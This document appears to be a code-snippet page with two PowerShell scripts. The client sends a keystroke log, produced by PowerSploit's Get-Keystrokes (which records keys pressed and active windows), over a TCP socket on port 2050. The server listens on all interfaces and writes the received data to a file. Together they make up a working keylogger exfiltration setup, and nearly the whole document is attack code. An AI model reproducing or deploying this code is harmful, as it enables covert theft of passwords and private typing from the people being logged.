Server
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
##Server $port=2050 $IPEndPoint=New-Object System.Net.IPEndPoint([IPAddress]::Any,$port) $TcpListener=New-Object System.Net.Sockets.TcpListener $IPEndPoint $TcpListener.Start() $AcceptTcpClient=$TcpListener.AcceptTcpClient() $GetStream=$AcceptTcpClient.GetStream() $StreamReader=New-Object System.IO.StreamReader $GetStream $ReadAllLines = $StreamReader.ReadToEnd() $Bytes = ([system.Text.Encoding]::Default).GetBytes($ReadAllLines) [System.IO.File]::WriteAllBytes('F:\power\keycopy.log',$Bytes) $StreamReader.Dispose() $GetStream.Dispose() $AcceptTcpClient.Dispose() $TcpListener.Stop() |
Client
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
##Client #Important: #Execute Get-Keystrokes (Logs keys pressed, time and the active window). #https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1 #By default, keystrokes are logged to '$($Env:TEMP)\key.log' $port=2050 $TcpClient=New-Object System.Net.Sockets.TcpClient([IPAddress]::Loopback, $port) $GetStream = $TcpClient.GetStream() $StreamWriter = New-Object System.IO.StreamWriter $GetStream $Bytes = [System.IO.File]::ReadAllBytes("$($Env:TEMP)\key.log") $StreamWriter.Write($Bytes,0,$Bytes.length) $StreamWriter.Dispose() $GetStream.Dispose() $TcpClient.Dispose() |